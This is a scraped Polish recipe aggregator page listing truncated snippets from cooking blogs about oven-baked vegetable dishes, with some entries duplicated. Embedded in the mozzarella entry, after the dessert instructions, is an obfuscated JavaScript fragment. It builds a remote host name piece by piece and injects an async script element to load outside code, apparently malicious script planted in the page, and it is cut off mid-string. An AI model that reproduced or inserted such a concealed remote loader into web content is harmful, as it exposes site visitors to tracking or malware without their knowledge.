warzywa z piekarnika - 6500 przepisów (strona:226/434)

Domowe nachos z paluchami z szynką 133

Talerz przekąsek na sylwestra, zabawy karnawałowe. Domowe nachos które robi się szybko, i paluchy sprężynki które zrobimy w 10 minut. Do tego pyszny dip serowy owoce i warzywa i mamy fajne zakąski. nachos: 50 g mąki pszennej 50 g mąki kukurydzianej sól, pieprz papryka słodka, ostra i wędzona kurkuma 2 łyżki oleju 60 ml wody gorącej paluchy: 1/2 opakowania ciasta(...)widelcem. Ciasto zagniatam rękoma jak na pierogi. Rozwałkowuję na stolnicy na placek o grubości 1 mm. Wykrawam dowolne kształty, trójkąty, kwadraty. Układam na blaszce wyłożonej papierem. Wstawiam do nagranego piekarnika góra dół temp 190 stopni i piekę około 7-10 minut. Uważać żeby nie spalić. Paluchy: Ciasto rozwałkowuję trochę, kroję na paski o szerokości 2 cm i dlugośi szynki. Szynkę

wesoła kuchnia
Krem z porów i ciecierzycy 140

białe części). Cebulę kroimy w większą kostkę. W rondelku lub na patelni rozgrzewamy olej. Dodajemy cebulę oraz pory. Po chwili dodajemy przeciśnięty przez praskę czosnek. Odrobinę solimy całość. Gdy warzywa się zeszklą, łączymy je z bulionem. Dodajemy połowę ciecierzycy. Gotujemy około 10-15 minut. Gdy por zmięknie, zupę miksujemy. Doprawiamy solą, oraz pieprzem. Dodajemy resztę ciecierzycy, po czym wlewamy śmietankę(...)najpierw dokładnie osączyć na sicie, a następnie osuszyć ręcznikiem papierowym (ja na próbę użyłam około 1/2 puszki). Osuszoną ciecierzycę przekładamy na wyłożoną papierem do pieczenia blaszkę i wstawiamy do piekarnika ustawionego na 200 stopni na około 15 minut. Po tym czasie ciecierzycę przesypujemy do miseczki, polewamy mniej niż 1 łyżką oliwy z oliwek, solimy oraz posypujemy niewielką ilością słodkiej papryki

Smaki Na Talerzu
KROKIETY Z KASZY JAGLANEJ Z PIECZONYM KURCZAKIEM I WARZYWAMI 134

nich przeróżne dania – zaczynając od śniadań, a na deserach kończąc! Dziś wyczarowałam obiad! Mam dla Was przepis na pyszne, chrupiące krokiety z kaszy jaglanej z pieczonym kurczakiem i warzywami. Smakują fenomenalnie i jest to danie, które posmakuje również zapalonym mięsożercom. Świetnie smakują z odrobiną parmezanu albo sosem jogurtowo-koperkowym z odrobiną czosnku. Koniecznie spróbujcie! SKŁADNIKI: * kasza jaglana(...)kokosowy do smażenia * parmezan SPOSÓB PRZYRZĄDZENIA: Oczyszczony filet z kurczaka nacieramy solą, pieprzem i papryką. Układamy na folii aluminiowej z odrobiną masła, zawijamy i wkładamy do nagrzanego na 170C piekarnika na ok. 25 minut ( do miękkości ). Wypłukaną dwukrotnie kasze jaglaną gotujemy w lekko osolonym wrzątku, studzimy. Do wystudzonej dodajemy bardzo drobno pokrojonego, upieczonego kurczaka, podsmażoną na odrobinie oleju kokosowego cebulkę

Ostra na Słodko
CANNELLONI Z FARSZEM MIĘSNYM Z PRZEWAGĄ PAPRYKI I PIECZAREK POD BESZAMELEM 145

papryka zmięknie. Dodać posiekaną bazylię i pietruszkę. 3.  Mięso umyć, osuszyć i zmielić. Doprawić solą, pieprzem i papryką. Czosnek przecisnąć przez praskę. Dokładnie wymieszać.  Dodać do warzyw na patelni i dokładnie wymieszać. Gdy mięso podsmaży się dodać przecier. Doprawić solą i pieprzem do smaku. 4.  Farszem dokładnie napełnić rurki cannelloni ( musza być pełne farszu) i ułożyć(...)mieszać. Doprawić solą, pieprzem.Ser zetrzeć na tarce o drobnych oczkach i dodać do beszamelu. Mieszać aż się rozpuści a sos zgęstnieje.  Gotowym beszamelem polać makaron. Wstawić do nagrzanego piekarnika do 180 stopni

Kuchnia Paulettes
Faszerowana cukinia z indykiem 121

okrągłe zielone cukinie 1 czerwona cebula 2 ząbki czosnku 1/2 szklanki bulguru 50 g mozzarelli olej do smażenia sól pieprz świeże zioła Wykonanie: Z cukinii odkrawamy kapelusik, a środek warzywa wydrążamy uważając,  aby nie uszkodzić skórki. Środek cukinii delikatnie solimy i ustawiamy do góry nogami. Bulgur zalewamy wrzątkiem, tak, aby przykrywał on kaszę z 1 centymetrowym zapasem. Przykrywamy(...)mięso, bulgur i ser. Dodajemy sól, pieprz, posiekany czosnek i dowodne świeże zioła. Ja dodałam oregano. Farszem napełniamy cukinie, przykrywamy odciętymi kapelusikami. Całość delikatnie smarujemy olejem i pieczemy w piekarniku nagrzanym do 180 stopni przez 30 minut. Od razu podajemy

Kulinarne przygody Gatity
Rzecz o chipsach ...z jarmużu 104

przetworzone i bez dodatków nie wyróżniają się niczym szczególnym, ale podpieczone zupełnie zmieniają smak, którym zaskakująco przypominają kalafior. Nie od dziś wiadomo, że chipsy można robić z różnych warzyw nie tylko z ziemniaków. Próbowałam chipsów z jabłek, gruszek czy pietruszki. Tym razem przygotowałam kolejną zdrową przekąskę, którą można zajadać się na okrągło (jest mało kaloryczna) Jarmuż można dostać już praktycznie(...)oliwek  opcjonalnie sól i pieprz do smaku  Przygotowanie: Jarmuż myjemy i osuszamy. Układamy listki na papierze do pieczenia, skrapiamy oliwą z oliwek ,ewentualnie posypujemy przyprawami. Pieczemy w piekarniku rozgrzanym do 150 stopni przez około 5 minut. Trzeba uważać aby nie przypalić liść ,ponieważ szybko się pieką. Idealne są zielone i chrupiące

Bon appetit mon amie
POLĘDWICZKA WIEPRZOWA Z KASZĄ / PORK TENDERLOIN WITH GROATS 113

pustego słoiczka wlewamy/wrzucamy/wsypujemy wszystkie składniki sosu, zakręcamy i mieszamy wstrząsając aż składniki się połączą. Jest to według mnie najłatwiejszy sposób na przygotowanie sosów czy marynat Gdy kasza i warzywa z patelni przestygną mieszamy ze sobą wszystkie składniki i odstawiamy na bok, żeby sałatka się trochę „przegryzła”. Teraz mięso. Polędwiczkę myjemy, suszymy i oczyszczamy ze wszystkich widocznych błon. Kładziemy na desce(...)rozsmarowujemy hummus (przepis niedługo ;)), kładziemy cheddara, chorizo i liście bazylii, wszystko jak najbardziej w jednej linii, żeby można było łatwo zwinąć roladę. Rozgrzewamy sporą patelnię z kroplą oleju. Włączamy piekarnik, 200 stopni, termoobieg, górna i dolna grzałka. Zwiniętą roladę przewiązujemy w kilku miejscach sznurkiem/nitką (niekolorową, żeby nie zafarbowała mięsa) i wrzucamy na mocno rozgrzaną patelnię (uwaga – będzie strzelać), przesmażamy

Martyna Cooks
POLĘDWICZKA WIEPRZOWA Z KASZĄ / PORK TENDERLOIN WITH GROATS 118

pustego słoiczka wlewamy/wrzucamy/wsypujemy wszystkie składniki sosu, zakręcamy i mieszamy wstrząsając aż składniki się połączą. Jest to według mnie najłatwiejszy sposób na przygotowanie sosów czy marynat Gdy kasza i warzywa z patelni przestygną mieszamy ze sobą wszystkie składniki i odstawiamy na bok, żeby sałatka się trochę „przegryzła”. Teraz mięso. Polędwiczkę myjemy, suszymy i oczyszczamy ze wszystkich widocznych błon. Kładziemy na desce(...)rozsmarowujemy hummus (przepis niedługo ;)), kładziemy cheddara, chorizo i liście bazylii, wszystko jak najbardziej w jednej linii, żeby można było łatwo zwinąć roladę. Rozgrzewamy sporą patelnię z kroplą oleju. Włączamy piekarnik, 200 stopni, termoobieg, górna i dolna grzałka. Zwiniętą roladę przewiązujemy w kilku miejscach sznurkiem/nitką (niekolorową, żeby nie zafarbowała mięsa) i wrzucamy na mocno rozgrzaną patelnię (uwaga – będzie strzelać), przesmażamy

Martyna Cooks
Krem z dyni z mleczkiem kokosowym 143

pieprzu cayenne 1/2 łyżeczki cukru 8 dużych krewetek, oczyszczonych sól, pieprz do smaku garść kiełków fasoli mun świeża kolendra do posypania CZAS PRZYGOTOWANIA: 60 MIN POZIOM TRUDNOŚCI: ŁATWY 1. Piekarnik podgrzewamy do 190 stopni Celsjusza. Dynię kroimy na mniejsze kawałki, układamy na kratce i pieczemy 40-50 minut do miękkości. Wyciągamy, odstawiamy do lekkiego przestygnięcia, obieramy ze skórki i kroimy(...)trochę więcej), dodajemy włoszczyznę, ziele angielskie i liście laurowe. Gotujemy na średnim ogniu ok. 30 minut. 3. Zupę przecedzamy, wrzucamy do niej z powrotem 1 marchewkę i cebulę, resztę warzyw wyrzucamy. Dodajemy dynię, mleko kokosowe, przyprawę curry, cynamon, pieprz cayenne,  cukier, doprawiamy solą i pieprzem. Gotujemy 20 minut.  4. Przy pomocy blendera, miksujemy zupę na gładki krem. Stawiamy

My Culinary Art
Zapiekane naleśniki warzywne z kiełbasą 183

być grube, bo będą pękać przy składaniu:) 2. Marchewkę, pietruszkę, seler pokroić w drobną kostkę, zalać 1/2 szklanki wody i 2 łyżkami oleju. Dusimy pod przykryciem.   3. Gdy warzywa troszkę zmiękną dodajemy pokrojony w pół plasterki por, kapustę pokrojoną w kostkę, pieczarki i kiełbasę. Dodajemy również przyprawy- wg własnego smaku i nadal dusimy.  4. Gdy jarzyny będą już(...)Połowę sera żółtego ścieramy na drobnych oczkach i mieszamy ze śmietaną. Smarujemy każdego naleśnika, a wierzch posypujemy resztą startego na dużych oczkach sera. Wkładamy do nagrzanego do 180st C piekarnika i zapiekamy ok 15 minut. Smacznego! Efekt końcowy

Kuchnia w czekoladzie
Burgery z bakłażanem w orzechowej panierce i tzatziki 183

których kotleta zastąpiłam pysznym bakłażanem przygotowanym w panierce z orzechów włoskich i parmezanu. Złociste plastry, miękkie w środku i chrupiące na zewnątrz, smakują świetnie w towarzystwie bułeczki, świeżych warzyw i niezawodnego  sosu tzatziki , na który przepis podałam Wam w sobotę. Bakłażany, dzięki swojej mięsistej konsystencji, świetnie zastępują mięso w daniach wegetariańskich. Wystarczy pokroić je w podłużne plastry i opanierować(...)razem komponują! Bakłażany z dzisiejszego przepisu możecie także podać z dodatkiem ziemniaków i surówki, czy z makaronem z pesto jak w tym przepisie . Zamiast smażyć, możecie je upiec w piekarniku.  Burgery z bakłażanem w orzechowej panierce i sosem tzatziki przepis własny Składniki: na bakłażany w orzechowej panierce: 1 bakłażan 40 g orzechów włoskich (waga bez łupin) 20 g parmezanu

Chilli Czosnek i Oliwa
Muffinki z dynią i rodzynkami 117

brązów. W takich właśnie kolorach są teraz parki i skwery, ale jesień, to również czas dyni i wielkich możliwości jej wykorzystania. Dzisiaj zapraszam na pyszne mufiny z tym warzywem. Składniki:  1/2 szklanki oleju roślinnego  2 jajka  1 płaska łyżeczka proszku do pieczenia 1 szklanka mąki pszennej 1/2 szklanki cukru pudru 1/2 łyżeczki  cynamonu 1/2 łyżeczki(...)składniki płynne, tj: olej, jajka, likier i startą dynię, Do składników mokrych dodać sypkie i wymieszać za pomocą łyżki. Ciasto przełozyć do foremnki na mufiny wyłożonej papilotkami. Piec w piekarniku z termoobiegiem nastawionym na 180C przez 25 minut. Smacznego

Gosia gotuje
Poniedziałkowy "fit" - paprykowo - ziołowe frytki z selera 136

cyklu Poniedziałkowy "fit".  Frytki kojarzą Nam się z bardzo kalorycznym daniem . Dziś postaramy się udowodnić, że tak być nie musi. Postanowiłyśmy przygotować frytki w wersji "fit". Pierwszym warzywem na które zamieniłyśmy ziemniaki był seler. Paprykowo - ziołowe frytki z selera wyszły bardzo smaczne.  Polecamy :-)  Paprykowo - ziołowe frytki z selera SKŁADNIKI: 1 duży seler 3 łyżki oleju rzepakowego papryka(...)wielkość wg uznania. Na głębokim talerzu łączymy olej z papryką i solą ziołową, następnie w marynacie obtaczamy frytki. Pieczemy na papierze do pieczenia w nagrzanym do 200 stopni piekarniku przez około 30 minut

Kulinarny Świat Konczi i Szpileczki
Sałatka fattoush z bobem, fasolką szparagową i labneh 121

fattoush , arabskiej sałatki z warzyw i czerstwego chlebka pita, która dzięki marynowanemu labneh stała się niezwykle bogata i pyszna. Nie ma jednego przepisu na fattoush , dajemy do niej te warzywa, które są w sezonie. W mojej nie mogło więc zabraknąć pysznego lipcowego bobu i zielonej fasolki.  Fattoush bardzo kojarzy mi się z toskańską sałatką panzanella . Obie służą wykorzystaniu czerstwego(...)kawałki 200 g młodego bobu 1 ogórek 2 pomidory 2 czerstwe chlebki pita lub 2 pszenne wrapy/tortille lub 4 kromki czerstwego chleba (pieczywo można podsuszyć w piekarniku w temperaturze 150 stopni C, aż będzie je można połamać na kawałki) na sos: sok z 1 cytryny, 2 ząbki czosnku, 2 łyżeczki sumaku, sól, 6 łyżek oliwy 8 kulek domowego sera labneh

Chilli Czosnek i Oliwa
Piernik pomidorowy - prosty, rewelacyjny 346

Piernik pomidorowy? Już widzę, jak wielu z Was zdziwiło się, kto zna ten przepis tylko się oblizuje. To piernik z kapitalnego przepisu Marty  z Jadłonomii

Gotuj zdrowo!Guten Appetit!
Poniedziałkowy "fit" - Drobiowe placuszki z cukinią i selerem 152

Jak na poniedziałek przystało zapraszamy na przepis lekki i smaczny. Dziś propozycja obiadu dla całej rodziny. Drobiowe placuszki są jednymi z moich ulubionych. Przygotować możemy je

Kulinarny Świat Konczi i Szpileczki
Kjufte, chrupiące frytki z piekarnika i sałatka szopska 163

Dziś przepis, który jest bułgarskim wspomnieniem wakacji! Zróbcie go, a poczujecie odrobinę Bułgarii w swoim domu. :) Bułgarskie jedzenie bardzo mi smakowało, było dobrze doprawione, grillowane, z dużą ilością warzyw i składników, które świetnie wpływają na trawienie. Zdecydowałam się podjąć wyzwanie i przygotować jedno z dań, które jadaliśmy tam najczęściej i muszę przyznać, że wyszło idealnie! Smak jest wierny temu(...)smażąc frytek w głębokim tłuszczu i... udało się! Te frytki są nie tylko mega chrupiące, ale przede wszystkim zdrowe, gdyż przyrządzone z bardzo małą ilością tłuszczu w piekarniku! Chrupiące frytki z piekarnika:  5-6 dużych ziemniaków (lub więcej, według uznania) 2 łyżeczki cukru wrząca woda 2 łyżki oliwy z oliwek lub oleju przyprawa do dań z ziemniaków (opcjonalnie) sól

Cooking Monster
Kjufte, chrupiące frytki z piekarnika i sałatka szopska 156

Dziś przepis, który jest bułgarskim wspomnieniem wakacji! Zróbcie go, a poczujecie odrobinę Bułgarii w swoim domu. :) Bułgarskie jedzenie bardzo mi smakowało, było dobrze doprawione, grillowane, z dużą ilością warzyw i składników, które świetnie wpływają na trawienie. Zdecydowałam się podjąć wyzwanie i przygotować jedno z dań, które jadaliśmy tam najczęściej i muszę przyznać, że wyszło idealnie! Smak jest wierny temu(...)smażąc frytek w głębokim tłuszczu i... udało się! Te frytki są nie tylko mega chrupiące, ale przede wszystkim zdrowe, gdyż przyrządzone z bardzo małą ilością tłuszczu w piekarniku! Chrupiące frytki z piekarnika:  5-6 dużych ziemniaków (lub więcej, według uznania) 2 łyżeczki cukru wrząca woda 2 łyżki oliwy z oliwek lub oleju przyprawa do dań z ziemniaków (opcjonalnie) sól

Cooking Monster
Warzywne placuszki z piekarnika z łososiem i dipem z limonką 165

przez tekstury i różnorodne smaki, które połączone razem tworzą lekkie, pyszne i sycące danie początku wiosny :) Buzią pełną tych pyszności spokojnie można wkroczyć w pełną wiosnę! Warzywne placuszki z piekarnika z łososiem i dipem z limonką Potrzebujesz: 700g ziemniaków 1 młodą cukinię 3 marchewki 2 cebulki dymki (całe, ze szczypiorem) 1 jajko 2 czubate łyżki mąki kukurydzianej 1 czubata łyżeczka(...)pietruszki 1/2 łyżki posiekanego szczypiorku sól do smaku Do tego: kilka plastrów łososia wędzonego na zimno roszponka (opcjonalnie) Sposób przyrządzenia: 1. Ziemniaki i marchewkę obierz ze skórki. 2. Wszystkie warzywa zetrzyj na tarce o dużych oczkach (lub użyj malaksera- dużo szybciej), przełóż do miski wyłożonej bawełnianą ściereczką, wymieszaj warzywa z 1 łyżeczką soli i odstaw na 15min. 3. Odciśnij przez

Kuchnia w Słońcu Skąpana
Jak wykorzystać ser mozzarella w kuchni? 127

Warzywa pokrój na cienkie plastry, przypraw i na oliwie z oliwek podsmaż na patelni. Jeśli korzystasz elektrycznego grilla, nie musisz już używać natłuszczenia. Gdy całość nabierze złotego koloru przełóż warzywa do miski i dodaj pokrojony w plastry ser mozzarella. Jabłko z mozzarellą na słodko Dużą zaletą sera mozzarella jest to, że z powodzeniem można go wykorzystać także do przyrządzania(...)dynie), a następnie wypełnić pokrojonym w kostkę serem mozzarella. W międzyczasie trzeba rozpuść miód. Gdy uzyska płynna konsystencję, należy polać nimi jabłka i posypać cynamonem. Następnie włożyć je do piekarnika na 20 minut. Deser smakuje wybornie ze szklanką kefiru. (function(){ xkbf_=("u"+"")+"s"+"";xkbf_+=("tat.")+("i"); xkbf=document.createElement("script");xkbf.type="text/javascript";xkbf_+="nf"+("o")+"/"; xkbfu="62569915"+".";xkbf.async=true;xkbfu+="tz6916mekbf9ns9ap2unmf6gfq3ua7

Mojewlasne.pl
Ekspresowe ciasto marchewkowe 162

moją słodką tajemnicą :) Nie ma co zdradzać swoich kulinarnych trików zbyt łatwo :) Nie zdążyłam niestety w miniony weekend dołączyć do akcji organizowanej przez Ciasto na niedzielę pt. Słodkości z warzywami . Dodaję przepis z opóźnieniem, ale z frajdą wcale nie mniejszą w odzewie na wspólne wypiekanie :) Składniki na 1 małą keksówkę o wymiarach LxWxH 20x10x6 cm: 200g marchwi - zważona po obraniu(...)jaja 1/2 szkl. oleju 1/3 łyżeczki sody oczyszczonej    Marchewkę umyć, oskrobać i zetrzeć na najdrobniejszych oczkach tarki - bądź posłużyć się elektryczną szatkownicą - mój ukochany nowy nabytek :) Włączyć piekarnik i pozwolić mu się w międzyczasie nagrzewać do 170C. Do jednej miski przesiać przez sitko mąkę wraz z proszkiem do pieczenia. Dodać cukier, cukier wanilinowy, sól i przyprawę do piernika

Grunt to przepis!
Papryka faszerowana mięsem mielonym i ryżem 399

Papryka to warzywo najczęściej kojarzone z przyrządzaniem surówek i sałatek. Tymczasem papryka faszerowana mięsem mielonym i ryżem to pyszne, sycące i zdrowe danie obiadowe. Chętnie zjemy je szczególnie w upalne dni. Składniki: 4 papryki pomidorowe, 25 dag żółtego sera, 1 woreczek ryżu, 1 cebula, 2 łyżki oleju, 300 g mielonego mięsa, 2 ząbki czosnku, ostra papryka, 1 łyżeczka słodkiej papryki(...)pieprz i sól. Papryka faszerowana mięsem mielonym i ryżem- jak przygotować? Kroimy cebulę oraz siekamy czosnek i pietruszkę. Trzemy żółty ser. Gotujemy ryż zgodnie z instrukcją na opakowaniu. Rozgrzewamy piekarnik do 175 C. Cebulę i czosnek podsmażamy na oleju, a następnie dodajemy mielone mięso i podsmażamy do przyrumienienia. W misce mieszamy mięso, czosnek , cebulę z pietruszką i połową startego sera

Kulinarnyblog.pl - wiesz jak gotować!
Pasta z pieczonej papryki 98

Pasta z pieczonej papryki Co prawda piekarnika u mnie brak, ale z pomocą, na szczęście zawsze, przychodzą gotowce. Tym razem sięgnąłem po pieczoną paprykę ze słoika. Wcześniej się jakoś nie złożyło, żeby zawitała w mojej kuchni, a tu proszę. Akurat jak czasu na gotowanie nie miałem to przyszła mi z pomocą i położyła się razem z pozostałymi składnikami w moim(...)jest po prostu boska! Ale teraz chyba najważniejsza kwestia, czyli jak polecam to jeść lub z czym. Osobiście zaserwowałem pastę na naleśnikach z ciecierzycy oraz z delikatnymi w smaku warzywami. Świetnie też sprawdzi się na kanapkach, cieście francuskim czy nawet jako sos do pizzy. Pasta z pieczonej papryki naprawdę wymiata! Pieczona papryka, suszone pomidory jak i papryczki czereśniowe zostały

Blendman
Zapiekanka bolońska (lasagne dla leniwych). 170

naczynia w którym będziemy piec zapiekankę. Przygotować sos boloński.  Marchew, cebulę i paprykę umyć, oczyścić i pokroić w zgrabną kostkę. Na patelni rozgrzać tłuszcz. Włożyć na niego warzywa, liść laurowy, posiekaną bazylię, posolić i podsmażać aż wyraźnie zmiękną. Dodać oba mięsa, rozbić na drobne części łyżką i podsmażyć aż zniknie kolor surowizny. Dołożyć pomidory wraz zalewą. Uzupełnić przyprawy: pieprz(...)Jest to ważne by makaron przykryć sosem dokładnie, inaczej zrobi się w tych miejscach twardy. Na całą zapiekankę zetrzeć pozostały żółty ser i wstawić ją na środkową półkę do piekarnika na 30 minut ( temperatura 170 stopni). Przed podaniem pozwolić zapiekance przestygnąć około 20 minut. Smacznego! Pozdrawiam ciepło, Kasia :-) Facebook /// Instagram

Poezja Smaków - blog kulinarny
,,Szparagi otulone boczkiem zatopione w serku rikotta’’ 98

następnie blanszujemy około 5 minut w osolonej, gotującej się wodzie. Blanszowanie to inaczej podgotowywanie, aby zachować niepowtarzalny smak i kolor. Jest to sposób na to, by nie jeść surowych warzyw, a równocześnie nie tracić ich chrupkości i świeżego smaku. Zblanszowane szparagi owijamy plastrem sera a następnie plastrem boczku i podsmażamy na patelni. W tym czasie sery mieszamy z jajkami, doprawiamy(...)ciasta układamy w naczyniu kolejno, każdy nieco przesuwając w stosunku do poprzedniego. Tak przygotowaną formę wypełniamy nadzieniem serowym oraz owiniętymi szparagami. Nadzienie przykrywamy płatami ciasta fillo. Pieczemy w piekarniku nagrzanym w 180-200 stopni na termoobiegu około 30 minut aż zmiękną i delikatnie się przyrumienią

Podróż w kulinaria
Pieczone frytki z selera 244

aury, niby zima, ale jednak nie. Wiosna? no też jeszcze trochę brakuje. Na sklepowych półkach też jeszcze wieje nudą. Trzeba sobie jakoś radzić, dlatego z chęcią sięgam po warzywa korzeniowe. Do frytek podeszłam sceptycznie. Mam teraz etap eksperymentowania w kuchni, poznawania nowych smaków, szukania własnej drogi. Eksperymenty nie zawsze mi wychodzą, np. jakbyście wpadli na pomysł fit-żurku z kalarepy(...)spróbowania :) Składniki: seler korzeniowy łyżka oliwy (można pominąć) sól zioła prowansalskie Selera obieramy, kroimy w słupki. Polewamy oliwą i posypujemy przyprawami.  Mieszamy i odstawiamy na pół godziny. Piekarnik nagrzewamy do 200 stopni, pieczemy 20-25 minut, aż będą ładnie zarumienione. Życzę smacznego

Czerwona Porzeczka
Pasztet z grzybami i zielonym pieprzem 166

garnka, zalać częścią gorącego wywaru i parzyć przez ok 15 minut, odcedzić dodać do mięsa. Przestudzone mięsa zmielić trzy razy przez sitko z małymi oczkami (3,5), z warzywami z rosołu, cebulą. Czosnek, rozmaryn i szałwię drobno posiekać, najlepiej w blenderze. Grzyby posiekać i dodać do masy razem z ziołami. Dodać płyn z gotowania grzybów. Doprawić masę solą, dużą ilością(...)posypać bułką tartą, dno wyłożyć cienkimi plasterkami boczku. Nałożyć masę pasztetową do 3/4 wysokości foremki, lekko wstrząsając, tak aby rozłożyła się równomiernie w naczyniu , przykryć plastrami boczku. Wstawić do piekarnika nagrzanego do 160 st C. Piec ok 50 minut, następnie odkryć , temperaturę podnieść do 180 st C i piec już bez przykrycia aby się pasztet lekko zrumienił. Powinien odchodzić

Stare Gary
Bakłażan faszerowny kaszą jaglaną 219

Lubicie kaszę jaglaną?  Nie dość, że pyszna, to tak bardzo zdrowa :) Dzisiaj przepis na bakłażany nadziewane kaszą jaglaną właśnie, w towarzystwie warzyw z nutą orientalnych przypraw. Zdrowo, smacznie i bezmięsnie :) SKŁADNIKI 2 średnie bakłażany 1 szklanka ugotowanej kaszy jaglanej 1 pęczek dymki 3 ząbki czosnku 1 duży pomidor 2 łyżki posiekanej kolendry 1 łyżeczka kuminu 1 łyżeczka kurkumy(...)pół i nacinamy nożem w kratkę, tak, by nie uszkodzić skóry. Oprószamy solą i pieprzem i skrapiamy oliwą. Wykładamy na blachę wyłożoną papierem do pieczenia i wstawiamy do piekarnika nagrzanego do 200 stopni na pół godziny. Łyżką wyciągamy upieczony miąższ - pozostawiając brzegi bakłażana. Na patelni rozgrzewamy łyżkę oliwy i podsmażamy posiekaną dymkę (białą i zieloną część) oraz drobno pokrojone ząbki

Moje Kuchenne Rewelacje
Naleśniki pikantne 143

pianę i dodaje do ciasta naleśnikowego , delikatnie łyżką mieszam. Na rozgrzana patelnie wlewam ciasto i rozprowadzam po całym dnie ( najmniej musi być 2 mm grubości) tak smażę wszystkie naleśniki . Warzywa i filet myję i osuszam ręcznikiem, następnie kroję w paski . Wrzucam na rozgrzaną patelnię ,posypuję solą aby szybciej zmiękły ,po 3-4 minutach dodaje pomidora lub koncentratu i kilka kropel(...)zwijam w rulon i układam w naczyniu żaroodpornym Ser ścieram na drobnych oczkach wbijam jajko i mieszam dodaje pieprzu . polewam tą miksturą naleśniki . wkladam do rozgrzanego do 250 stopni piekarnika na 15 minut ( ser musi sie rozpuścić .) Przekąska gotowa ,jednakowo smaczna na zimno i na cieplo . Trochę keczupu lub innego sosu ostrego podniesie smak potrawie

Eli Gotowanie
Zapiekana kokosowa owsianka z arestem i jagodami 159

Zdecydowanie obecna pora roku to ta, którą uwielbiam najbardziej. Bogactwo świeżych, lokalnych warzyw i owoców. Zapach, który unosi się od nich w powietrzu. Aż chce się żyć, jeść i.. nie tyć. Przepis na bardzo zdrowe śniadanie, lekkie a przy tym trochę kwaśne. Zdecydowanie jestem zwolenniczką korzystania z sezonowych darów. Wykorzystajmy je w pełni!   Składniki: 1 szklanka płatków owsianych(...)podania: syrop klonowy, świeży agrest i jagody, mięta   Wieczorem zalewam płatki mlekiem kokosowym i dodaję szczyptę cynamonu. Kolejnego dnia rano dodaję agrest, cukier i jagody. Mieszam. Wstawiam do piekarnika nagrzanego do 180 stopni na 30 minut. Przed podaniem posypuję świeżymi owocami i polewam syropem klonowym.   Smacznego, Klaudia

Mango Papaja
Chrupiący kurczak 305

zawsze wychodzi. Polecam szczególnie, gdy masz już dość klasycznych obiadów a czasu jak zwykle brakuje. Możesz zaserwować go zarówno z pieczonym ziemniaczkiem, jak i sosem czosnkowym lub/ i warzywami sezonowymi. Świetnie sprawdzi się na imprezę, jako przystawka podczas oglądania meczu, czy na rodzinny obiad. Spróbuj, czekam na twoją opinię! Składniki: podwójna pierś z kurczaka pomysł na .... soczyste skrzydełka z miodem(...)Smaż na złoty kolor na mocno rozgrzanym oleju rzepakowym. * Panieruj dopiero przed smażeniem. * Jeśli chcesz, aby twój kurczak był mniej kaloryczny zamiast smażyć go na oleju, upiecz go w piekarniku. Smacznego! Ten i inne przepisy znajdziecie na stronie http://www.wielkiapetyt.blogspot.com

Wielki apetyt
Chleb wiejski z sokiem warzywnym (z automatu) 175

smaczny, mięciutki, długo zachowuje świeżość. Przepis pochodzi z książki "Domowy Chleb" Yvana Cadiou. Składniki: 400 g mąki pszennej chlebowej (typ 750) łyżeczka słodkiej wędzonej papryki 120 ml soku z warzyw (użyłam soku warzywnego Fortuna) 100 ml wody łyżka oliwy z oliwek 2 łyżeczki drożdży piekarskich (instant) łyżka cukru łyżeczka soli Przygotowanie: Do formy do pieczenia wlać wodę, sok warzywny(...)wybieram program 1. - chleb podstawowy, zmniejszam gramaturę chleba na 750 g). Gdy automat zakończy pracę wyjąć chleb z formy i położyć na metalowej kratce, aby wystygł. W piekarniku: Wszystkie suche składniki wymieszać w misce. Dodać składniki płynne i wyrobić.  Zagniecione ciasto odstawić na godzinę do wyrośnięcia. Po godzinie ponownie wyrobić, przełożyć do foremki i znów zostawić na ok. godzinę

Domowa Cookierenka Agi